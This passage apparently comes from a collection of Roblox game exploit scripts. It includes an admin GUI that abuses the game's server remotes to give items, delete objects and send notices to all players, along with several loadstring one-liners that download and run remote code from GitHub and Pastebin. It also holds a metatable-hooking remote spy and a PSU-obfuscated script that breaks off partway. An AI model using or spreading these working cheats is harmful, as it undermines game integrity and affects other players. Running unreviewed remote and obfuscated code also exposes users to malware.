Color3.new(0, 0, 0) 137 | MessageLabel.Position = UDim2.new(0, 0, 0.162303671, 0) 138 | MessageLabel.Size = UDim2.new(0, 463, 0, 36) 139 | MessageLabel.Font = Enum.Font.SciFi 140 | MessageLabel.Text = "Messge GUI" 141 | MessageLabel.TextColor3 = Color3.new(1, 0, 0) 142 | MessageLabel.TextSize = 14 143 | 144 | Title.Name = "Title" 145 | Title.Parent = MessageGui 146 | Title.BackgroundColor3 = Color3.new(0, 0, 0) 147 | Title.Position = UDim2.new(0.179265663, 0, 0.366492152, 0) 148 | Title.Size = UDim2.new(0, 293, 0, 34) 149 | Title.Font = Enum.Font.SciFi 150 | Title.PlaceholderColor3 = Color3.new(1, 0, 0) 151 | Title.PlaceholderText = "Title" 152 | Title.Text = "" 153 | Title.TextColor3 = Color3.new(1, 0, 0) 154 | Title.TextSize = 14 155 | 156 | Message.Name = "Message" 157 | Message.Parent = MessageGui 158 | Message.BackgroundColor3 = Color3.new(0, 0, 0) 159 | Message.Position = UDim2.new(0.179265663, 0, 0.562827229, 0) 160 | Message.Size = UDim2.new(0, 293, 0, 34) 161 | Message.Font = Enum.Font.SciFi 162 | Message.PlaceholderColor3 = Color3.new(1, 0, 0) 163 | Message.PlaceholderText = "Message" 164 | Message.Text = "" 165 | Message.TextColor3 = Color3.new(1, 0, 0) 166 | Message.TextSize = 14 167 | 168 | ExecuteButton.Name = "ExecuteButton" 169 | ExecuteButton.Parent = MessageGui 170 | ExecuteButton.BackgroundColor3 = Color3.new(0, 0, 0) 171 | ExecuteButton.Position = UDim2.new(0.282937378, 0, 0.735602081, 0) 172 | ExecuteButton.Size = UDim2.new(0, 203, 0, 43) 173 | ExecuteButton.Font = Enum.Font.SciFi 174 | ExecuteButton.Text = "Execute" 175 | ExecuteButton.TextColor3 = Color3.new(1, 0, 0) 176 | ExecuteButton.TextSize = 14 177 | 178 | ExitButton.Name = "ExitButton" 179 | ExitButton.Parent = MessageGui 180 | ExitButton.BackgroundColor3 = Color3.new(0, 0, 0) 181 | ExitButton.Position = UDim2.new(0.280777544, 0, 0.924083769, 0) 182 | ExitButton.Size = UDim2.new(0, 203, 0, 29) 183 | ExitButton.Font = Enum.Font.SciFi 184 | ExitButton.Text = "Exit" 185 | ExitButton.TextColor3 = Color3.new(1, 0, 0) 186 | ExitButton.TextSize = 14 187 | 188 | OpenGui.Name = "OpenGui" 189 | OpenGui.Parent = Redwood 190 | OpenGui.BackgroundColor3 = Color3.new(1, 1, 1) 191 | OpenGui.Position = UDim2.new(0, 0, 0.468127489, 0) 192 | OpenGui.Size = UDim2.new(0, 100, 0, 31) 193 | OpenGui.Visible = false 194 | 195 | Open.Name = "Open" 196 | Open.Parent = OpenGui 197 | Open.BackgroundColor3 = Color3.new(0, 0, 0) 198 | Open.Size = UDim2.new(0, 100, 0, 31) 199 | Open.Font = Enum.Font.SciFi 200 | Open.Text = "Open" 201 | Open.TextColor3 = Color3.new(1, 0, 0) 202 | Open.TextSize = 14 203 | -- Scripts: 204 | 205 | DeleteTools.MouseButton1Click:connect(function() 206 | local btool = Instance.new("Tool",game.Players.LocalPlayer.Backpack) 207 | local SelectionBox = Instance.new("SelectionBox",game.Workspace) 208 | SelectionBox.Name = "oof" 209 | SelectionBox.LineThickness = 0.05 210 | SelectionBox.Adornee = nil 211 | SelectionBox.Color3 = Color3.fromRGB(0,0,255) 212 | SelectionBox.Visible = false 213 | btool.Name = "Delete Tool" 214 | btool.RequiresHandle = false 215 | local IsEquipped = false 216 | local Mouse = game.Players.LocalPlayer:GetMouse() 217 | 218 | btool.Equipped:connect(function() 219 | IsEquipped = true 220 | SelectionBox.Visible = true 221 | SelectionBox.Adornee = nil 222 | end) 223 | 224 | btool.Unequipped:connect(function() 225 | IsEquipped = false 226 | SelectionBox.Visible = false 227 | SelectionBox.Adornee = nil 228 | end) 229 | 230 | 231 | btool.Activated:connect(function() 232 | if IsEquipped then 233 | game.Workspace.resources.RemoteEvent:FireServer("toggleShield", Mouse.Target) 234 | end 235 | end) 236 | 237 | while true do 238 | SelectionBox.Adornee = Mouse.Target or nil 239 | wait(0.1) 240 | end 241 | end) 242 | 243 | Sometools.MouseButton1Click:connect(function() 244 | game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "M98B") 245 | game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "Revolver") 246 | game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "UMP-45") 247 | game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "Parachute") 248 | game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "ACR") 249 | game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "M60") 250 | game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "M14") 251 | game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "Fake ID Card") 252 | game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "Shank") 253 | end) 254 | 255 | MessageGUI.MouseButton1Click:connect(function() 256 | RedwoodGui.Visible = false 257 | MessageGui.Visible = true 258 | end) 259 | 260 | Exit.MouseButton1Click:connect(function() 261 | RedwoodGui.Visible = false 262 | OpenGui.Visible = true 263 | end) 264 | 265 | ExecuteButton.MouseButton1Click:Connect(function() 266 | local A_1 = "FireAllClients" 267 | local A_2 = "showNotice" 268 | local A_3 = Title.Text 269 | local A_4 = Message.Text 270 | local Event = game:GetService("Workspace").resources.RemoteEvent 271 | Event:FireServer(A_1, A_2, A_3, A_4) 272 | end) 273 | 274 | ExitButton.MouseButton1Click:connect(function() 275 | MessageGui.Visible = false 276 | RedwoodGui.Visible = true 277 | end) 278 | 279 | LoginButton.MouseButton1Click:connect(function() 280 | if User.Text == "Trail" and Pass.Text == "Op" then 281 | LoginGui:Destroy() 282 | RedwoodGui.Visible = true 283 | end 284 | end) 285 | 286 | Open.MouseButton1Click:connect(function() 287 | RedwoodGui.Visible = true 288 | OpenGui.Visible = false 289 | end) 290 | -------------------------------------------------------------------------------- /Murder Mystery 2: -------------------------------------------------------------------------------- 1 | loadstring(game:HttpGet("https://raw.githubusercontent.com/Doggo-cryto/EclipseMM2/master/Script", true))() 2 | -------------------------------------------------------------------------------- /Normal Arsenal GUI: -------------------------------------------------------------------------------- 1 | loadstring(game:HttpGet("https://raw.githubusercontent.com/NougatBitz/ArsenalHaxx/master/Script"))(); 2 | -------------------------------------------------------------------------------- /Pathom Hub: -------------------------------------------------------------------------------- 1 | loadstring(game:HttpGet("https://pastebin.com/raw/UmhaEvTT",true))() 2 | -------------------------------------------------------------------------------- /Remote Spy: -------------------------------------------------------------------------------- 1 | --[[ 2 | 3 | -Created by Ip Tested. 4 | 5 | ]] 6 | 7 | _G.scanRemotes = true 8 | 9 | make_writeable(getrawmetatable(game)) 10 | local pseudoEnv = {} 11 | local gameMeta = getrawmetatable(game) 12 | 13 | local tabChar = " " 14 | 15 | local function getSmaller(a, b, notLast) 16 | local aByte = a:byte() or -1 17 | local bByte = b:byte() or -1 18 | if aByte == bByte then 19 | if notLast and #a == 1 and #b == 1 then 20 | return -1 21 | elseif #b == 1 then 22 | return false 23 | elseif #a == 1 then 24 | return true 25 | else 26 | return getSmaller(a:sub(2), b:sub(2), notLast) 27 | end 28 | else 29 | return aByte < bByte 30 | end 31 | end 32 | 33 | local function parseData(obj, numTabs, isKey, overflow, noTables, forceDict) 34 | local objType = typeof(obj) 35 | local objStr = tostring(obj) 36 | if objType == "table" then 37 | if noTables then 38 | return objStr 39 | end 40 | local isCyclic = overflow[obj] 41 | overflow[obj] = true 42 | local out = {} 43 | local nextIndex = 1 44 | local isDict = false 45 | local hasTables = false 46 | local data = {} 47 | 48 | for key, val in next, obj do 49 | if not hasTables and typeof(val) == "table" then 50 | hasTables = true 51 | end 52 | 53 | if not isDict and key ~= nextIndex then 54 | isDict = true 55 | else 56 | nextIndex = nextIndex + 1 57 | end 58 | 59 | data[#data+1] = {key, val} 60 | end 61 | 62 | if isDict or hasTables or forceDict then 63 | out[#out+1] = (isCyclic and "Cyclic " or "") .. "{" 64 | table.sort(data, function(a, b) 65 | local aType = typeof(a[2]) 66 | local bType = typeof(b[2]) 67 | if bType == "string" and aType ~= "string" then 68 | return false 69 | end 70 | local res = getSmaller(aType, bType, true) 71 | if res == -1 then 72 | return getSmaller(tostring(a[1]), tostring(b[1])) 73 | else 74 | return res 75 | end 76 | end) 77 | for i = 1, #data do 78 | local arr = data[i] 79 | local nowKey = arr[1] 80 | local nowVal = arr[2] 81 | local parseKey = parseData(nowKey, numTabs+1, true, overflow, isCyclic) 82 | local parseVal = parseData(nowVal, numTabs+1, false, overflow, isCyclic) 83 | if isDict then 84 | local nowValType = typeof(nowVal) 85 | local preStr = "" 86 | local postStr = "" 87 | if i > 1 and (nowValType == "table" or typeof(data[i-1][2]) ~= nowValType) then 88 | preStr = "\n" 89 | end 90 | if i < #data and nowValType == "table" and typeof(data[i+1][2]) ~= "table" and typeof(data[i+1][2]) == nowValType then 91 | postStr = "\n" 92 | end 93 | out[#out+1] = preStr .. string.rep(tabChar, numTabs+1) .. parseKey .. " = " .. parseVal .. ";" .. postStr 94 | else 95 | out[#out+1] = string.rep(tabChar, numTabs+1) .. parseVal .. ";" 96 | end 97 | end 98 | out[#out+1] = string.rep(tabChar, numTabs) .. "}" 99 | else 100 | local data2 = {} 101 | for i = 1, #data do 102 | local arr = data[i] 103 | local nowVal = arr[2] 104 | local parseVal = parseData(nowVal, 0, false, overflow, isCyclic) 105 | data2[#data2+1] = parseVal 106 | end 107 | out[#out+1] = "{" .. table.concat(data2, ", ") .. "}" 108 | end 109 | 110 | return table.concat(out, "\n") 111 | else 112 | local returnVal = nil 113 | if (objType == "string" or objType == "Content") and (not isKey or tonumber(obj:sub(1, 1))) then 114 | local retVal = '"' .. objStr .. '"' 115 | if isKey then 116 | retVal = "[" .. retVal .. "]" 117 | end 118 | returnVal = retVal 119 | elseif objType == "EnumItem" then 120 | returnVal = "Enum." .. tostring(obj.EnumType) .. "." .. obj.Name 121 | elseif objType == "Enum" then 122 | returnVal = "Enum." .. objStr 123 | elseif objType == "Instance" then 124 | returnVal = obj.Parent and obj:GetFullName() or obj.ClassName 125 | elseif objType == "CFrame" then 126 | returnVal = "CFrame.new(" .. objStr .. ")" 127 | elseif objType == "Vector3" then 128 | returnVal = "Vector3.new(" .. objStr .. ")" 129 | elseif objType == "Vector2" then 130 | returnVal = "Vector2.new(" .. objStr .. ")" 131 | elseif objType == "UDim2" then 132 | returnVal = "UDim2.new(" .. objStr:gsub("[{}]", "") .. ")" 133 | elseif objType == "BrickColor" then 134 | returnVal = "BrickColor.new(\"" .. objStr .. "\")" 135 | elseif objType == "Color3" then 136 | returnVal = "Color3.new(" .. objStr .. ")" 137 | elseif objType == "NumberRange" then 138 | returnVal = "NumberRange.new(" .. objStr:gsub("^%s*(.-)%s*$", "%1"):gsub(" ", ", ") .. ")" 139 | elseif objType == "PhysicalProperties" then 140 | returnVal = "PhysicalProperties.new(" .. objStr .. ")" 141 | else 142 | returnVal = objStr 143 | end 144 | return returnVal 145 | end 146 | end 147 | 148 | function tableToString(t) 149 | return parseData(t, 0, false, {}, nil, false) 150 | end 151 | 152 | local detectClasses = { 153 | BindableEvent = false; 154 | BindableFunction = false; 155 | RemoteEvent = true; 156 | RemoteFunction = true; 157 | } 158 | 159 | local ignoreNames = { 160 | Event = true; 161 | MessagesChanged = true; 162 | } 163 | 164 | local classMethods = { 165 | BindableEvent = "Fire"; 166 | BindableFunction = "Invoke"; 167 | RemoteEvent = "FireServer"; 168 | RemoteFunction = "InvokeServer"; 169 | } 170 | 171 | local realMethods = {} 172 | 173 | for name, enabled in next, detectClasses do 174 | if enabled then 175 | realMethods[classMethods[name]] = Instance.new(name)[classMethods[name]] 176 | end 177 | end 178 | 179 | for key, value in next, gameMeta do pseudoEnv[key] = value end 180 | 181 | local incId = 0 182 | 183 | gameMeta.__index, gameMeta.__namecall = function(self, key) 184 | if not realMethods[key] or ignoreNames[self.Name] or not _G.scanRemotes then return pseudoEnv.__index(self, key) end 185 | return function(_, ...) 186 | incId = incId + 1 187 | local nowId = incId 188 | local strId = "[RemoteSpy_" .. nowId .. "]" 189 | 190 | local allPassed = {...} 191 | local returnValues = {realMethods[key](self, ...)} 192 | 193 | print("\n" .. strId .. " ClassName: " .. self.ClassName .. " | Path: " .. self:GetFullName() .. " | Method: " .. key .. "\n" .. strId .. " Packed Arguments: " .. tableToString(allPassed) .. "\n" .. strId .. " Packed Returned: " .. tableToString(returnValues) .. "\n") 194 | --copystr(tableToString(allPassed)) 195 | return unpack(returnValues) 196 | end 197 | end 198 | 199 | print("\nIp Tested's Remote Spy\n") 200 | -------------------------------------------------------------------------------- /Shinobi Life 2: -------------------------------------------------------------------------------- 1 | _G.speed = 750 2 | 3 | loadstring(game:HttpGet("https://raw.githubusercontent.com/reavscripts/sl2_autofarm/main/main.lua", true))() 4 | -------------------------------------------------------------------------------- /Size Script: -------------------------------------------------------------------------------- 1 | function giant(p, size) 2 | local pchar = p.Character 3 | if pchar then 4 | local function scale(chr,scl) 5 | 6 | for _,v in pairs(pchar:GetChildren()) do 7 | if v:IsA("Hat") then 8 | v:Clone() 9 | v.Parent = game.Lighting 10 | end 11 | end 12 | 13 | local Head = chr['Head'] 14 | local Torso = chr['Torso'] 15 | local LA = chr['Left Arm'] 16 | local RA = chr['Right Arm'] 17 | local LL = chr['Left Leg'] 18 | local RL = chr['Right Leg'] 19 | local HRP = chr['HumanoidRootPart'] 20 | 21 | wait(0.1) 22 | 23 | Head.formFactor = 3 24 | Torso.formFactor = 3 25 | LA.formFactor = 3 26 | RA.formFactor = 3 27 | LL.formFactor = 3 28 | RL.formFactor = 3 29 | HRP.formFactor = 3 30 | 31 | Head.Size = Vector3.new(scl * 2, scl, scl) 32 | Torso.Size = Vector3.new(scl * 2, scl * 2, scl) 33 | LA.Size = Vector3.new(scl, scl * 2, scl) 34 | RA.Size = Vector3.new(scl, scl * 2, scl) 35 | LL.Size = Vector3.new(scl, scl * 2, scl) 36 | RL.Size = Vector3.new(scl, scl * 2, scl) 37 | HRP.Size = Vector3.new(scl * 2, scl * 2, scl) 38 | 39 | local Motor1 = Instance.new('Motor6D', Torso) 40 | Motor1.Part0 = Torso 41 | Motor1.Part1 = Head 42 | Motor1.C0 = CFrame.new(0, 1 * scl, 0) * CFrame.Angles(-1.6, 0, 3.1) 43 | Motor1.C1 = CFrame.new(0, -0.5 * scl, 0) * CFrame.Angles(-1.6, 0, 3.1) 44 | Motor1.Name = "Neck" 45 | 46 | local Motor2 = Instance.new('Motor6D', Torso) 47 | Motor2.Part0 = Torso 48 | Motor2.Part1 = LA 49 | Motor2.C0 = CFrame.new(-1 * scl, 0.5 * scl, 0) * CFrame.Angles(0, -1.6, 0) 50 | Motor2.C1 = CFrame.new(0.5 * scl, 0.5 * scl, 0) * CFrame.Angles(0, -1.6, 0) 51 | Motor2.Name = "Left Shoulder" 52 | 53 | local Motor3 = Instance.new('Motor6D', Torso) 54 | Motor3.Part0 = Torso 55 | Motor3.Part1 = RA 56 | Motor3.C0 = CFrame.new(1 * scl, 0.5 * scl, 0) * CFrame.Angles(0, 1.6, 0) 57 | Motor3.C1 = CFrame.new(-0.5 * scl, 0.5 * scl, 0) * CFrame.Angles(0, 1.6, 0) 58 | Motor3.Name = "Right Shoulder" 59 | 60 | local Motor4 = Instance.new('Motor6D', Torso) 61 | Motor4.Part0 = Torso 62 | Motor4.Part1 = LL 63 | Motor4.C0 = CFrame.new(-1 * scl, -1 * scl, 0) * CFrame.Angles(0, -1.6, 0) 64 | Motor4.C1 = CFrame.new(-0.5 * scl, 1 * scl, 0) * CFrame.Angles(0, -1.6, 0) 65 | Motor4.Name = "Left Hip" 66 | 67 | local Motor5 = Instance.new('Motor6D', Torso) 68 | Motor5.Part0 = Torso 69 | Motor5.Part1 = RL 70 | Motor5.C0 = CFrame.new(1 * scl, -1 * scl, 0) * CFrame.Angles(0, 1.6, 0) 71 | Motor5.C1 = CFrame.new(0.5 * scl, 1 * scl, 0) * CFrame.Angles(0, 1.6, 0) 72 | Motor5.Name = "Right Hip" 73 | 74 | local Motor6 = Instance.new('Motor6D', HRP) 75 | Motor6.Part0 = HRP 76 | Motor6.Part1 = Torso 77 | Motor6.C0 = CFrame.new(0, 0, 0) * CFrame.Angles(-1.6, 0, -3.1) 78 | Motor6.C1 = CFrame.new(0, 0, 0) * CFrame.Angles(-1.6, 0, -3.1) 79 | 80 | end 81 | 82 | scale(pchar, size) 83 | pchar.Humanoid.WalkSpeed = 15 * size 84 | 85 | for _,v in pairs(game.Lighting:GetChildren()) do 86 | if v:IsA("Hat") then 87 | v.Parent = pchar 88 | end 89 | end 90 | end 91 | end 92 | 93 | local plr = game.Players.LocalPlayer 94 | giant(plr,1) 95 | 96 | 97 | local csize = 1 98 | 99 | local sgui = Instance.new("ScreenGui", game.Players.LocalPlayer.PlayerGui) 100 | local base = Instance.new("Frame", sgui) 101 | base.BackgroundTransparency = 1 102 | base.Size = UDim2.new(0, 110, 0, 200) 103 | base.Position = UDim2.new(1, -120, 1, -180) 104 | local indicator = Instance.new("TextLabel", base) 105 | indicator.Size = UDim2.new(1, 0, 0, 25) 106 | indicator.TextColor3 = Color3.new(1, 1, 1) 107 | indicator.BackgroundTransparency = 0 108 | indicator.FontSize = Enum.FontSize.Size18 109 | indicator.Font = Enum.Font.SourceSans 110 | indicator.Text = "Current Size: 3" 111 | local PlusOne = Instance.new("TextButton", base) 112 | PlusOne.BackgroundColor3 = Color3.new(214/255, 214/255, 214/255) 113 | PlusOne.Position = UDim2.new(0, 0, 0, 40) 114 | PlusOne.Size = UDim2.new(1, 0, 0.5, -50) 115 | PlusOne.BorderSizePixel = 2 116 | PlusOne.Font = Enum.Font.SourceSansBold 117 | PlusOne.FontSize = Enum.FontSize.Size24 118 | PlusOne.Text = "+.1 Size" 119 | local MinusOne = Instance.new("TextButton", base) 120 | MinusOne.BackgroundColor3 = Color3.new(214/255, 214/255, 214/255) 121 | MinusOne.Position = UDim2.new(0, 0, 0.5, 10) 122 | MinusOne.Size = UDim2.new(1, 0, 0.5, -50) 123 | MinusOne.Text = "-.1 Size" 124 | MinusOne.BorderSizePixel = 2 125 | MinusOne.Font = Enum.Font.SourceSansBold 126 | MinusOne.FontSize = Enum.FontSize.Size24 127 | 128 | PlusOne.MouseButton1Down:connect(function() 129 | csize = csize + .1 130 | giant(plr, csize) 131 | indicator.Text = "Current Size: "..tostring(csize) 132 | end) 133 | 134 | MinusOne.MouseButton1Down:connect(function() 135 | csize = csize - .1 136 | giant(plr, csize) 137 | indicator.Text = "Current Size: "..tostring(csize) 138 | end) 139 | -------------------------------------------------------------------------------- /Stay alive and flex your time on others: -------------------------------------------------------------------------------- 1 | getgenv().ss = Vector3.new(25,25,25) -- Sword size 2 | getgenv().hl = 35 -- Health limit 3 | 4 | -- support server: discord.gg/VDuRyuZ 5 | 6 | loadstring(game:HttpGet("https://raw.githubusercontent.com/Kelvinouo/Hub/master/killal"))() 7 | -------------------------------------------------------------------------------- /Tower Of Hell: -------------------------------------------------------------------------------- 1 | return(function(l,...)local k="This file was obfuscated using PSU Obfuscator 4.0.A | https://www.psu.dev/ & discord.gg/psu";local X=l[.6624076159961557];local Q=l[.14933920146401003];local H=l['HlIyTCQO7M'];local t=l['PE10Ck0RQ0'];local W=l[(220087742)];local R=l[(810312616)];local F=l['FmhgTColU'];local B=l[((#{}+960397686))];local T=l[.8734795008196866];local O=l[(335661088)];local P=l[(677925955)];local o=l[((#{330;}+597633956))];local d=l[((#{880;843;711;[604]=330;586;}+468091466))];local c=l["ygR0hP0M"];local s=l[(444002649)];local D=l[(531902987)];local m=l[((#{304;195;446;}+854159441))];local A=l[((#{781;403;938;}+460883684))];local M=l['erbeEao'];local h=l['h1ngR0R7J'];local C=l[(278790812)];local n=l[((#{660;}+306312065))];local Y=l[(675101826)];local x=l['M4vqsm'];local S=l[(566866416)];local N=l[(579983897)];local G=l[(97469237)];local a=l[(633273814)];local u=l[(78242104)];local q=((getfenv)or(function(...)return(_ENV);end));local i,f,e=({}),(""),(q(o));local i=((e[""..l[d]..l[B]..l[a].."\51\50"])or(e[""..l[d].."\105\116"])or({}));local t=(((i)and(i["\98"..l[t].."\111\114"]))or(function(l,e)local o,c=o,x;while((l>x)and(e>x))do local d,a=l%n,e%n;if d~=a then c=c+o;end;l,e,o=(l-d)/n,(e-a)/n,o*n;end;if lx do local e=l%n;if e>x then c=c+o;end;l,o=(l-e)/n,o*n;end;return(c);end));local r=(n^D);local E=(r-o);local w,b,v;local r=(f["\115\117\98"]);local U=(f["\99"..l[R]..l[c]..l[h]]);local s=(f["\98"..l[s]..l[a]..l[.9166698758102347]]);local f=(f["\103\115"..l["d0XAT"].."\98"]);local f=((e["\117"..l[C].."\112"..l[c].."\99\107"])or(e[""..l[a]..l[c]..l[d]..l[A]..l[.9166698758102347]]["\117\110"..l[F]..l[c]..l[T]..l[.8463812427811237]]));local p=(e["\109"..l[c].."\116\104"]["\102\108"..l[.5537449384824117]..l[.5537449384824117]..l[h]]);local R=(e["\114\97"..l[.21539482018695902]..l[u].."\101\116"]);local J=((e["\109"..l[c].."\116\104"]["\108\100"..l[.9166698758102347].."\120"..l[F]])or(function(l,e,...)return((l*n)^e);end));local R=(e["\116\111"..l[C]..l.d0XAT.."\109"..l[d].."\101"..l[h]]);local g=(e[""..l[u].."\101\108"..l[.9166698758102347].."\99\116"]);local y=(e[""..l[F]..l[c]..l[B]..l[h]..l[u]]);local j=(e["\115\101\116"..l[M].."\101"..l[a]..l[c]..l[a].."\97"..l[d].."\108\101"]);b=((i[""..l[h]..l[u].."\104\105"..l["qshCk"]..l[a]])or(function(e,l,...)if(l=l)and(n))or(a));end;end;local function a()local d,l,n,a=s(C,c,c+d);d=t(d,e);e=d%o;l=t(l,e);e=l%o;n=t(n,e);e=n%o;a=t(a,e);e=a%o;c=c+A;return((a*B)+(n*E)+(l*o)+d);end;local function d()local n,l=s(C,c,c+h);n=t(n,e);e=n%o;l=t(l,e);e=l%o;c=c+h;return((l*o)+n);end;local R=""..l[.8991696228735008];local function w(...)return({...}),g(R,...);end;local function k(...)local E=l[.14933920146401003];local k=l[.2943290375612346];local q=l[((#{790;639;}+174493959))];local F=l[((#{}+306312066))];local g=l[(994647444)];local D=l[(434671730)];local Y=l[(583702902)];local H=l[.9596475092506257];local A=l['qabx8'];local U=l[.12526960024855546];local Q=l[(217967049)];local p=l[.15456647200256887];local G=l[(912968923)];local n=l["M4vqsm"];local N=l[(656917394)];local j=l[(500677454)];local B=l[(531902987)];local W=l[(949810097)];local X=l[(235166436)];local M=l[((#{378;678;469;719;}+337442570))];local T=l.XRmOE;local o=l[(597633957)];local w=l[(675101826)];local m=l[.4618643994731197];local O=l[(913092391)];local P=l[(836338542)];local v=l["eJX0aAqfW0"];local function b(...)local R=({});local l=({});local h=({});for d=n,a(e)-o,o do local f=x(e);if(f==G)then local e=x(e);l[d]=(e~=n);elseif(f==M)then while(true)do local c=a(e);local e=a(e);local t=o;local a=(i(e,o,U)*(F^B))+c;local c=i(e,m,v);local e=((-o)^i(e,B));if(c==n)then if(a==n)then l[d]=(e*n);break;else c=o;t=n;end;elseif(c==P)then l[d]=(a==n)and(e*(o/n))or(e*(n/n));break;end;l[d]=J(e,c-O)*(t+(a/(F^T)));break;end;elseif(f==k)then while(true)do local a=a(e);if(a==n)then l[d]=('');break;end;if(a>Y)then local n,x=(''),(r(C,c,c+a-o));c=c+a;for l=o,#x,o do local l=t(s(r(x,l,l)),e);e=l%D;n=n..u[l];end;l[d]=n;else local o,n=(''),({s(C,c,c+a-o)});c=c+a;for n,l in y(n)do local l=t(l,e);e=l%D;o=o..u[l];end;l[d]=o;end;break;end;else l[d]=(nil);end;end;local c=a(e);for l=n,c-o,o do h[l]=({});end;for D=n,c-o,o do local t=x(e);if(t~=n)then t=t-o;local u,B,r,c,f,C=n,n,n,n,n,n;local s=i(t,o,w);if(s==n)then r=(d(e));u=(x(e));c=(d(e));f=(d(e));elseif(s==E)then r=(d(e));u=(x(e));c=(d(e));f=(a(e));C=({});for l=o,r,o do C[l]=({[n]=x(e),[o]=d(e)});end;elseif(s==F)then u=(x(e));c=(d(e));f=h[(a(e))];elseif(s==A)then elseif(s==w)then r=(d(e));u=(x(e));c=(d(e));f=h[(a(e))];elseif(s==o)then u=(x(e));c=(d(e));f=(a(e));end;if(i(t,g,g)==o)then c=l[c];end;if(i(t,E,E)==o)then f=l[f];end;if(i(t,q,q)==o)then B=h[a(e)];else B=h[D+o];end;if(i(t,A,A)==o)then r=l[r];end;local l=h[D];l[-Q]=u;l['hNcdLHGQ']=B;l['dHjt2']=c;l["BYuoevwR"]=C;l[-p]=f;l[W]=r;end;end;local c=d(e);for l=n,a(e)-o,o do R[l]=b();end;local e=x(e);return({[j]=c;[X]=R;['bWW']=h;['DYjOtPu']=e;[-H]=l;[N]=n;});end;return(b(...));end;local function r(l,C,i,...)local t=l[587433];local e=l[-720860];local o=l["DYjOtPu"];local e=l[360846];local e=l["bWW"];local s=l[194919];return(function(...)local n='dHjt2';local x=e[0];local l={};local h=({});local u=(g(R,...)-1);local E={...};local D='hNcdLHGQ';local c=-55852;local F=-526443;local a=-(1);local d=894679;local A={};local B='BYuoevwR';for e=0,u,1 do if(e>=o)then A[e-o]=E[e+1];else l[e]=E[e+1];end;end;local u=u-o+1;while(true)do local e=x;local o=e[F];x=e[D];if(o<=17)then if(o<=8)then if(o<=3)then if(o<=1)then if(o==0)then if(l[e[n]])then x=e[c];end;elseif(o<=1)then l[e[n]]=(e[c]~=0);end;elseif(o==2)then l[e[n]]();elseif(o<=3)then local e=e[n];local n,o=w(l[e](l[e+1]));a=o+e-1;local o=0;for e=e,a do o=o+1;l[e]=n[o];end;end;elseif(o<=5)then if(o>4)then local o=e[n];local c={l[o](l[o+1]);};local n=e[d];local e=0;for o=o,n do e=e+1;l[o]=c[e];end;for e=n+1,t do l[e]=nil;end;elseif(o<5)then do return(l[e[n]]);end;end;elseif(o<=6)then x=e[c];elseif(o>7)then l[e[n]]=e[c];elseif(o<8)then local o=e[n];local n,e=w(l[o](f(l,o+1,e[c])));a=e+o-1;local e=0;for o=o,a do e=e+1;l[o]=n[e];end;end;elseif(o<=12)then if(o<=10)then if(o>9)then l[e[n]]=G(256);elseif(o<10)then local e=e[n];l[e]=l[e](l[e+1]);for e=e+1,t do l[e]=nil;end;end;elseif(o>11)then l[e[n]]=l[e[c]][e[d]];elseif(o<12)then l[e[n]]=l[e[c]];end;elseif(o<=14)then if(o==13)then l[e[n]][e[c]]=l[e[d]];elseif(o<=14)then local e=e[n];l[e](f(l,e+1,a));for e=e+1,a do l[e]=nil;end;end;elseif(o<=15)then l[e[n]]=i[e[c]];elseif(o>16)then i[e[c]]=l[e[n]];elseif(o<17)then local e=e[n];do return l[e](f(l,e+1,a))end;end;elseif(o<=26)then if(o<=21)then if(o<=19)then if(o>18)then if(l[e[n]]~=e[d])then x=e[c];end;elseif(o<19)then l[e[n]]=C[e[c]];end;elseif(o==20)then do return;end;elseif(o<=21)then local o=e[n];local n=l[e[c]];l[o+1]=n;l[o]=n[e[d]];end;elseif(o<=23)then if(o==22)then if(not(l[e[n]]))then x=e[c];end;elseif(o<=23)then l[e[n]][e[c]]=e[d];end;elseif(o<=24)then local e=e[n];l[e](l[e+1]);for e=e,t do l[e]=nil;end;elseif(o>25)then local o=e[n];l[o]=l[o](f(l,o+1,e[c]));for e=o+1,t do l[e]=nil;end;elseif(o<26)then local e=e[n];do return f(l,e,a);end;end;elseif(o<=30)then if(o<=28)then if(o>27)then local o=e[n];local c={l[o](f(l,o+1,a));};local n=e[d];local e=0;for o=o,n do e=e+1;l[o]=c[e];end;for e=n+1,t do l[e]=nil;end;elseif(o<28)then local o=e[n];l[o](f(l,o+1,e[c]));for e=o+1,t do l[e]=nil;end;end;elseif(o>29)then l[e[n]]=r(s[e[c]],(nil),i);elseif(o<30)then local e=e[n];l[e]=l[e](f(l,e+1,a));for e=e+1,a do l[e]=nil;end;end;elseif(o<=32)then if(o==31)then local e=e[n];l[e]=l[e]();elseif(o<=32)then local o=e[n];local a=e[d];local n=o+2;local o=({l[o](l[o+1],l[n]);});for e=1,a do l[n+e]=o[e];end;local o=o[1];if(o)then l[n]=o;x=e[c];end;end;elseif(o<=33)then local o=e[n];local c=l[o];local e,n=0,50*(e[d]-1);for o=o+1,a,1 do c[n+e+1]=l[o];e=e+1;end;elseif(o==34)then local e=e[n];a=e+u-1;for o=0,u do l[e+o]=A[o];end;for e=a+1,t do l[e]=nil;end;elseif(o<=35)then local c=s[e[c]];local a=e[B];local o={};local t=j({},{__index=function(e,l)local l=o[l];return(l[1][l[2]]);end,__newindex=function(n,l,e)local l=o[l];l[1][l[2]]=e;end;});for e=1,e[d],1 do local n=a[e];if(n[0]==0)then o[e-1]=({l,n[1]});else o[e-1]=({C,n[1]});end;h[#h+1]=o;end;l[e[n]]=r(c,t,i);end;end;end);end;return 